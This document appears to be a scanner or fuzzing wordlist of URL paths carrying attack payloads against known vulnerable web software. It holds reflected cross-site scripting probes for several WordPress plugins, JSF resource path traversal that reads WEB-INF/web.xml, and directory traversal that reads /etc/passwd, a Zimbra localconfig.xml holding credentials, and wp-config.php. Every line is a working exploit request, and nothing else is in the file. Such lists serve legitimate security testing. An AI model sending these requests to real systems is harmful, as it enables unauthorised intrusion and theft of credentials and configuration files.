/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E
/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/secureader/javax.faces.resource/web.xml?loc=../WEB-INF
/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF
/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00
/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E
